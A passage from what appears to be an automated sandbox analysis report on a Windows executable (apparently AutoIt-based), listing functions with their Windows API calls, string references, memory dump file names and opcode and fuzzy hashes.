SendMessageW.USER32(?,00001002,00000000,?), ref: 009E7708

Strings

SysMonthCal32, xrefs: 009E769B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: fda4d0316d0893bf026c584d3fff129da361d1f2375f0c655544b58e75a538e7
Instruction ID: 503aead80d60100f0078a351fe7d3c8f4dfca68b54a54eddf1d3b4bb409660ab
Opcode Fuzzy Hash: fda4d0316d0893bf026c584d3fff129da361d1f2375f0c655544b58e75a538e7
Instruction Fuzzy Hash: 1121D132514258BBDF12CFA4CC86FEA3B69EF88714F110214FE156B1D0D6B1AC519BA1

Uniqueness

Uniqueness Score: -1.00%

Function 009E6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009E6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009E6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009E6FDF

Strings

Listbox, xrefs: 009E6F77

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 84933eaa94ee59bbf17a846be9156d26a47b008a1fd573c3e9044fec7488353c
Instruction ID: 7ccc8e53f438d05cf21e2e3cc3faeb4d30c1691e4f7f7fd81c0256bc95241d4d
Opcode Fuzzy Hash: 84933eaa94ee59bbf17a846be9156d26a47b008a1fd573c3e9044fec7488353c
Instruction Fuzzy Hash: 7021D432610158BFDF128F55DC85FBB3BAEEF997A4F018524F9049B190CA71AC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009E797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009E79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009E79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009E7A03

Strings

msctls_trackbar32, xrefs: 009E79B8

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 69b9365ca3a6956287f67afcd2a595b934b7cffa83357b39994f00c0cfa96734
Instruction ID: 57e5ebeeb53e7c6f38b42014a585340cf5607c458c50fbbc6ccdcad14acb5fa4
Opcode Fuzzy Hash: 69b9365ca3a6956287f67afcd2a595b934b7cffa83357b39994f00c0cfa96734
Instruction Fuzzy Hash: FC112372244288BBEF219FA1CC05FEB77ADEF89B64F010529FA00A60D0D2719C11DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00964C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00964C2E), ref: 00964CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00964CB5

Strings

kernel32.dll, xrefs: 00964C9E
GetNativeSystemInfo, xrefs: 00964CAF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: d62426d845ef7b9d9ed5d76e3352f0f71e5b30115b431d504606bc383fce8e56
Instruction ID: c4459a3061ca2698a452945f1366f2d62a27d8039c154598146e4567d3d7a633
Opcode Fuzzy Hash: d62426d845ef7b9d9ed5d76e3352f0f71e5b30115b431d504606bc383fce8e56
Instruction Fuzzy Hash: ACD02E30924727CFC7208F72CE6864272E9AF40780B14C83FD8CACA250E774CC80CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00964D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00964CE1,?), ref: 00964DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00964DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00964DAE
kernel32.dll, xrefs: 00964D9D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: b19a979be20b35ca78477996c684d125e634a54d366180ccdb0d688424e86a05
Instruction ID: 15db3215c9c641ac9745d85edd2ae95b397a70a2f4b33fb4a8fd6c1fe852115d
Opcode Fuzzy Hash: b19a979be20b35ca78477996c684d125e634a54d366180ccdb0d688424e86a05
Instruction Fuzzy Hash: 72D01771968713DFD7209F71D868A8A76E8AF09355B15C83ED8C6DA190E770EC80CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00964D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00964D2E,?,00964F4F,?,00A262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00964D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00964D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00964D7B
kernel32.dll, xrefs: 00964D6A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 88b8b0ff16847ef9b16e6a98d69b4666c75060bd29904df487b6c48726087c11
Instruction ID: 00c7daeb245a3ca719c7f9c1b7201a4d4bed5ff1e797c328b53febe19796b866
Opcode Fuzzy Hash: 88b8b0ff16847ef9b16e6a98d69b4666c75060bd29904df487b6c48726087c11
Instruction Fuzzy Hash: 34D01730928753DFD7209F71D86865676E8BF15392B15C83E9486DA290E670E880CA51

Uniqueness

Uniqueness Score: -1.00%

Function 009E1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,009E12C1), ref: 009E1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009E1092

Strings

RegDeleteKeyExW, xrefs: 009E108C
advapi32.dll, xrefs: 009E107B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 3ad1739ca98821ef54f5f7c3a905119315525891631a02871a32bea268d1478a
Instruction ID: 66c128e12108213612d6886b6588c59c2e036da598cda8c3af61ef83ca33a8c4
Opcode Fuzzy Hash: 3ad1739ca98821ef54f5f7c3a905119315525891631a02871a32bea268d1478a
Instruction Fuzzy Hash: 32D01230524752DFD7205F35D86859676E8BF45352B118C3EA485DA150D7B0CCC0C650

Uniqueness

Uniqueness Score: -1.00%

Function 009D93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,009D9009,?,009EF910), ref: 009D9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009D9415

Strings

kernel32.dll, xrefs: 009D93FE
GetModuleHandleExW, xrefs: 009D940F

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 21bbf5109eddd37b2485e7e6a89cbe95c779ee0b9276618a4468266996a18334
Instruction ID: 66e6dae21e5ea9cb23e46f72b63c0b12a262230e07509d8e5b1ba91b6dc014bb
Opcode Fuzzy Hash: 21bbf5109eddd37b2485e7e6a89cbe95c779ee0b9276618a4468266996a18334
Instruction Fuzzy Hash: 12D0C730668B27CFC720AF31C95820372E8AF00346B00C83FA486EA660E670C880CA50

Uniqueness

Uniqueness Score: -1.00%

Function 009A1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 009A1B42
__swprintf.LIBCMT ref: 009A1B73

Strings

WIN_XPe, xrefs: 009A1BB2
%.3d, xrefs: 009A1B4D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 0e77c703dc94ffd56f7300213941f6bde0e55136f54314b3de0902576d7c604d
Instruction ID: af24aee55e90413ef5abc16bb1d1fc2a523662718a623f83d7662cff3ef0be96
Opcode Fuzzy Hash: 0e77c703dc94ffd56f7300213941f6bde0e55136f54314b3de0902576d7c604d
Instruction Fuzzy Hash: C7D017B1808118EBCB04AA90DC849FA737CAB09301F140DA2F906E2004F3389B84ABB2

Uniqueness

Uniqueness Score: -1.00%

Function 009B76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eaf80d11172b75081f090cb0338fe9b5d73ddf4c6ec2374afd6e76b2399a491
Instruction ID: d8a8e9a5ecc2aaeb79cbdc3e491cbfec120f4fcd87adf45fd6e25cbbd9124b86
Opcode Fuzzy Hash: 9eaf80d11172b75081f090cb0338fe9b5d73ddf4c6ec2374afd6e76b2399a491
Instruction Fuzzy Hash: 78C14D75A0421AEFCB14CF94C984EAEF7B9FF88724B158699E805EB251D730DE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009DE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 009DE3D2
CharLowerBuffW.USER32(?,?), ref: 009DE415

Part of subcall function 009DDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009DDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 009DE615
_memmove.LIBCMT ref: 009DE628

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 2725d611b9a6e08152188995bfaec1bef59c5662b5f5033ebaf4710aa421d6cc
Instruction ID: b1df913fb8a29ecd902fc6e85e31596e6fe8c2101c771d8d82b2cd41071d69ec
Opcode Fuzzy Hash: 2725d611b9a6e08152188995bfaec1bef59c5662b5f5033ebaf4710aa421d6cc
Instruction Fuzzy Hash: 92C15A756083019FC714EF28C490A6ABBE4FF89718F14896EF8999B351D731E946CF82

Uniqueness

Uniqueness Score: -1.00%

Function 009D83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009D83D8
CoUninitialize.OLE32 ref: 009D83E3

Part of subcall function 009BDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009BDAC5

VariantInit.OLEAUT32(?), ref: 009D83EE
VariantClear.OLEAUT32(?), ref: 009D86BF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 5e88d0f4e59b1fe444d36f31170532a6fb536768fdaf837709e8fb26c9b84588
Instruction ID: 5c4665d77b2913249a71294d56edff5d5e9ec16300eaf93040dab7168e676ad4
Opcode Fuzzy Hash: 5e88d0f4e59b1fe444d36f31170532a6fb536768fdaf837709e8fb26c9b84588
Instruction Fuzzy Hash: 7FA13C752447019FCB10EF58C495B1AB7E8BF88324F18885DF99A9B3A2CB34ED04CB42

Uniqueness

Uniqueness Score: -1.00%

Function 009B7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009F2C7C,?), ref: 009B7C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009F2C7C,?), ref: 009B7C4A
CLSIDFromProgID.OLE32(?,?,00000000,009EFB80,000000FF,?,00000000,00000800,00000000,?,009F2C7C,?), ref: 009B7C6F
_memcmp.LIBCMT ref: 009B7C90

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 797c28db9841a1aa0a57ba23ada9d47d7f34e1342d4a0eb3520baff3bcc53267
Instruction ID: 124a0aff9fb728317d9cdaefbb5695a5e59af0c11dc45de4979b13cfffafa01a
Opcode Fuzzy Hash: 797c28db9841a1aa0a57ba23ada9d47d7f34e1342d4a0eb3520baff3bcc53267
Instruction Fuzzy Hash: 16810971A04109EFCB04DFD4C984EEEB7B9FF89315F204599E516AB250DB71AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009B6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009B6E04
SysAllocString.OLEAUT32(00000000), ref: 009B6EAD
VariantCopy.OLEAUT32 ref: 009B6EDC
VariantClear.OLEAUT32(?), ref: 009B6F03

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: e56659d809e8360e7a6a72c156a551e187a6b3b6b937a9fc8af85538e82f59dc
Instruction ID: a1b26feb5f177c72fd95b1ba2ed62f20b52ee37abca4373314986664e6f3000a
Opcode Fuzzy Hash: e56659d809e8360e7a6a72c156a551e187a6b3b6b937a9fc8af85538e82f59dc
Instruction Fuzzy Hash: A451A8316083019ADB20AFA5D595BB9F3E9AFC5320F208D1FF556CB6D1DB78A8409B11

Uniqueness

Uniqueness Score: -1.00%

Function 009C97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00965045: _fseek.LIBCMT ref: 0096505D

Part of subcall function 009C99BE: _wcscmp.LIBCMT ref: 009C9AAE
Part of subcall function 009C99BE: _wcscmp.LIBCMT ref: 009C9AC1

_free.LIBCMT ref: 009C992C
_free.LIBCMT ref: 009C9933
_free.LIBCMT ref: 009C999E

Part of subcall function 00982F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00989C64), ref: 00982FA9
Part of subcall function 00982F95: GetLastError.KERNEL32(00000000,?,00989C64), ref: 00982FBB

_free.LIBCMT ref: 009C99A6

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
Instruction ID: 90ba2a3de016a74a9e8b096882c81da4213252918c7fbd7eb380c5495661c7b5
Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
Instruction Fuzzy Hash: 7E514CB1D04218AFDF249F64CC85B9EBBB9EF88310F1004AEB609A7241DB755E80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 009E9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0163F018,?), ref: 009E9AD2
ScreenToClient.USER32(00000002,00000002), ref: 009E9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 009E9B72

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 212341496416bde68dc6e4e498b60e226fa1fee63162996fa572699bf380c246
Instruction ID: 684f05b0d86038ae907301a61972344a2c8a5266c92c2339b72247dbf4a5ff85
Opcode Fuzzy Hash: 212341496416bde68dc6e4e498b60e226fa1fee63162996fa572699bf380c246
Instruction Fuzzy Hash: AE515234A00289EFDF21DF59D880AAE7BB9FF55320F148169F8159B290D730ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009D6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 009D6CE4
WSAGetLastError.WSOCK32(00000000), ref: 009D6CF4

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009D6D58
WSAGetLastError.WSOCK32(00000000), ref: 009D6D64

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: d9395230cbfad74ed03e190ba6c01aa1bee0bac294e2f220a3463e3b48591854
Instruction ID: c8abc830a0d72d30f32122181c7aa0ff9fc5bacd780aec32ac851925536f29a6
Opcode Fuzzy Hash: d9395230cbfad74ed03e190ba6c01aa1bee0bac294e2f220a3463e3b48591854
Instruction Fuzzy Hash: DB418275740200AFEB10AF24DC86F3A77E99B84B10F44C519FA5A9F3D2DA759D008791

Uniqueness

Uniqueness Score: -1.00%

Function 009D672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,009EF910), ref: 009D67BA
_strlen.LIBCMT ref: 009D67EC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
